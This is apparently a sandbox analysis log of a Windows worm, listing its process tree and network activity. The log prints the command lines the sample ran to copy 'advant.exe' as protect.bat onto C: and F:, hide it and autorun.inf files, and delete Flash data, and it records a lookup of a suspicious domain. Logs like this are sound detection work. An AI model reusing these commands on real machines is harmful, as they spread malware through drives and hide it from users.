                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                    • Sets file to hidden
                                                                                                                                                                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                    PID:2716
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c attrib +R +H "C:\protect.bat"
                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                    PID:2140
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                      attrib +R +H "C:\protect.bat"
                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                      • Sets file to hidden
                                                                                                                                                                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                      PID:2396
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects"
                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                    PID:1344
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects"
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                    PID:2436
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c attrib +R +H "F:\autorun.inf"
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                      PID:596
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                        attrib +R +H "F:\autorun.inf"
                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                        • Sets file to hidden
                                                                                                                                                                                                                                                                                                                        • Drops autorun.inf file
                                                                                                                                                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                        PID:2032
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c attrib +R +H "C:\autorun.inf"
                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                        PID:1248
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                          attrib +R +H "C:\autorun.inf"
                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                          • Sets file to hidden
                                                                                                                                                                                                                                                                                                                          • Drops autorun.inf file
                                                                                                                                                                                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                          PID:1072
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c attrib -R -H "C:\protect.bat"
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                          PID:860
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                            attrib -R -H "C:\protect.bat"
                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                            PID:2200
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c attrib -R -H "F:\protect.bat"
                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                            PID:1868
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                              attrib -R -H "F:\protect.bat"
                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                              • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                              PID:1844
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c attrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                              PID:1688
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                attrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"
                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                PID:880
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c attrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"
                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                PID:2140
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                  attrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"
                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                  PID:3068
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\advant.exe" "C:\protect.bat"
                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                  PID:2500
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\advant.exe" "F:\protect.bat"
                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                    PID:1644
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c attrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"
                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                      PID:1924
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                        attrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"
                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                        • Sets file to hidden
                                                                                                                                                                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                        PID:840
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c attrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"
                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                        PID:1716
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                          attrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"
                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                          • Sets file to hidden
                                                                                                                                                                                                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                          PID:1908
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c attrib +R +H "C:\protect.bat"
                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                          PID:388
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                            attrib +R +H "C:\protect.bat"
                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                            • Sets file to hidden
                                                                                                                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                            PID:1552
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c attrib +R +H "F:\protect.bat"
                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                            PID:1872
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                              attrib +R +H "F:\protect.bat"
                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                              • Sets file to hidden
                                                                                                                                                                                                                                                                                                                                              • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                              PID:2232
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects"
                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                            PID:2828
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c attrib +R +H "C:\autorun.inf"
                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                              PID:2812
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                attrib +R +H "C:\autorun.inf"
                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                • Sets file to hidden
                                                                                                                                                                                                                                                                                                                                                • Drops autorun.inf file
                                                                                                                                                                                                                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                PID:2012
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c attrib +R +H "F:\autorun.inf"
                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                PID:2540
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                  attrib +R +H "F:\autorun.inf"
                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                  • Sets file to hidden
                                                                                                                                                                                                                                                                                                                                                  • Drops autorun.inf file
                                                                                                                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                  PID:1392
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c attrib -R -H "C:\protect.bat"
                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                  PID:1208
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                    attrib -R -H "C:\protect.bat"
                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                    PID:1092
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c attrib -R -H "F:\protect.bat"
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                    PID:2000
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                      attrib -R -H "F:\protect.bat"
                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                      PID:2764
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c attrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"
                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                      PID:808
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                        attrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"
                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                        PID:2240
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c attrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"
                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                        PID:2284
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                          attrib -S -R -H "C:\Users\Admin\AppData\Roaming\advant.exe"
                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                          PID:2976
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\advant.exe" "C:\protect.bat"
                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                          PID:1648
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Roaming\advant.exe" "F:\protect.bat"
                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                            PID:2040
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c attrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"
                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                              PID:2452
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                attrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"
                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                • Sets file to hidden
                                                                                                                                                                                                                                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                PID:2372
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c attrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"
                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                PID:2028
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                  attrib +S +R +H "C:\Users\Admin\AppData\Roaming\advant.exe"
                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                  • Sets file to hidden
                                                                                                                                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                  PID:1136
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c attrib +R +H "C:\protect.bat"
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:2464
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                    attrib +R +H "C:\protect.bat"
                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                    • Sets file to hidden
                                                                                                                                                                                                                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                    PID:1652
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c attrib +R +H "F:\protect.bat"
                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:2180
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                      attrib +R +H "F:\protect.bat"
                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                      • Sets file to hidden
                                                                                                                                                                                                                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                      PID:1336

                                                                                                                                                                                                                                                                                                                                                                Network

                                                                                                                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                                                                                                                  kaserskpy.info
                                                                                                                                                                                                                                                                                                                                                                  rawcircle.scr
                                                                                                                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                                                                                                                  kaserskpy.info
                                                                                                                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                                                                                                                  redir.metaservices.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                                                                                                                  redir.metaservices.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                                                                                                                  redir.metaservices.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                                                                                                                  redir.metaservices.microsoft.com.edgesuite.net
                                                                                                                                                                                                                                                                                                                                                                  redir.metaservices.microsoft.com.edgesuite.net
                                                                                                                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                                                                                                                  a1095.g2.akamai.net
                                                                                                                                                                                                                                                                                                                                                                  a1095.g2.akamai.net
                                                                                                                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                                                                                                                  173.222.211.58
                                                                                                                                                                                                                                                                                                                                                                  a1095.g2.akamai.net
                                                                                                                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                                                                                                                  173.222.211.35
                                                                                                                                                                                                                                                                                                                                                                • flag-gb
                                                                                                                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                                                                                                                  http://redir.metaservices.microsoft.com/redir/allservices/?sv=5&locale=409&geoid=f4&version=12.0.7601.17514&userlocale=409
                                                                                                                                                                                                                                                                                                                                                                  wmplayer.exe
                                                                                                                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                                                                                                                  173.222.211.58:80
                                                                                                                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                                                                                                                  GET /redir/allservices/?sv=5&locale=409&geoid=f4&version=12.0.7601.17514&userlocale=409 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Windows-Media-Player/12.0.7601.17514
                                                                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                                  Host: redir.metaservices.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                                                                                                                  HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                  Server: AkamaiGHost
                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                  Location: http://onlinestores.metaservices.microsoft.com/serviceswitching/AllServices.aspx?sv=5&locale=409&geoid=f4&version=12.0.7601.17514&userlocale=409
                                                                                                                                                                                                                                                                                                                                                                  Date: Sat, 13 Jul 2024 11:45:45 GMT
                                                                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                                                                                                                  onlinestores.metaservices.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                  wmplayer.exe
                                                                                                                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                                                                                                                  onlinestores.metaservices.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                                                                                                                  onlinestores.metaservices.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                                                                                                                  serviceswitching.metaservices.microsoft.com.edgesuite.net
                                                                                                                                                                                                                                                                                                                                                                  serviceswitching.metaservices.microsoft.com.edgesuite.net
                                                                                                                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                                                                                                                  a177.g.akamai.net
                                                                                                                                                                                                                                                                                                                                                                  a177.g.akamai.net
                                                                                                                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                                                                                                                  92.123.142.201
                                                                                                                                                                                                                                                                                                                                                                  a177.g.akamai.net
                                                                                                                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                                                                                                                  92.123.140.35
                                                                                                                                                                                                                                                                                                                                                                • flag-gb
                                                                                                                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                                                                                                                  http://onlinestores.metaservices.microsoft.com/serviceswitching/AllServices.aspx?sv=5&locale=409&geoid=f4&version=12.0.7601.17514&userlocale=409
                                                                                                                                                                                                                                                                                                                                                                  wmplayer.exe
                                                                                                                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                                                                                                                  92.123.142.201:80
                                                                                                                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                                                                                                                  GET /serviceswitching/AllServices.aspx?sv=5&locale=409&geoid=f4&version=12.0.7601.17514&userlocale=409 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Windows-Media-Player/12.0.7601.17514
                                                                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                  Host: onlinestores.metaservices.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                  Content-Type: application/xml
                                                                                                                                                                                                                                                                                                                                                                  ETag: "df03e65b8e082f24dab09c57bc9c6241:1507068277"
                                                                                                                                                                                                                                                                                                                                                                  Last-Modified: Tue, 03 Oct 2017 22:04:36 GMT
                                                                                                                                                                                                                                                                                                                                                                  Server: AkamaiNetStorage
                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 546
                                                                                                                                                                                                                                                                                                                                                                  Date: Sat, 13 Jul 2024 11:45:45 GMT
                                                                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                • flag-gb
                                                                                                                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                                                                                                                  http://onlinestores.metaservices.microsoft.com/bing/bing.xml?locale=409&geoid=f4&version=12.0.7601.17514&userlocale=409
                                                                                                                                                                                                                                                                                                                                                                  wmplayer.exe
                                                                                                                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                                                                                                                  92.123.142.201:80
                                                                                                                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                                                                                                                  GET /bing/bing.xml?locale=409&geoid=f4&version=12.0.7601.17514&userlocale=409 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Windows-Media-Player/12.0.7601.17514
                                                                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                                  Host: onlinestores.metaservices.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                  Content-Type: application/xml
                                                                                                                                                                                                                                                                                                                                                                  ETag: "d58da90d6dc51f97cb84dfbffe2b2300:1507068209"
                                                                                                                                                                                                                                                                                                                                                                  Last-Modified: Tue, 03 Oct 2017 22:03:27 GMT
                                                                                                                                                                                                                                                                                                                                                                  Server: AkamaiNetStorage
                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 523
                                                                                                                                                                                                                                                                                                                                                                  Date: Sat, 13 Jul 2024 11:45:45 GMT
                                                                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                                                                                                                  images.windowsmedia.com
                                                                                                                                                                                                                                                                                                                                                                  wmplayer.exe
                                                                                                                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                                                                                                                  images.windowsmedia.com
                                                                                                                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                                                                                                                  images.windowsmedia.com
                                                                                                                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                                                                                                                  images.windowsmedia.com.akadns.net
                                                                                                                                                                                                                                                                                                                                                                  images.windowsmedia.com.akadns.net
                                                                                                                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                                                                                                                  images.windowsmedia.com.edgesuite.net
                                                                                                                                                                                                                                                                                                                                                                  images.windowsmedia.com.edgesuite.net
                                                                                                                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                                                                                                                  a1076.g.akamai.net
                                                                                                                                                                                                                                                                                                                                                                  a1076.g.akamai.net
                                                                                                                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                                                                                                                  92.123.142.209
                                                                                                                                                                                                                                                                                                                                                                  a1076.g.akamai.net
                                                                                                                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                                                                                                                  92.123.143.232
                                                                                                                                                                                                                                                                                                                                                                • flag-gb
                                                                                                                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                                                                                                                  http://images.windowsmedia.com/svcswitch/mg4_wmp12_30x30_2.png
                                                                                                                                                                                                                                                                                                                                                                  wmplayer.exe
                                                                                                                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                                                                                                                  92.123.142.209:80
                                                                                                                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                                                                                                                  GET /svcswitch/mg4_wmp12_30x30_2.png HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Windows-Media-Player/12.0.7601.17514
                                                                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                                  Host: images.windowsmedia.com
                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                                                  Last-Modified: Mon, 10 Nov 2008 23:46:38 GMT
                                                                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                  ETag: "a09cf928e43c91:0"
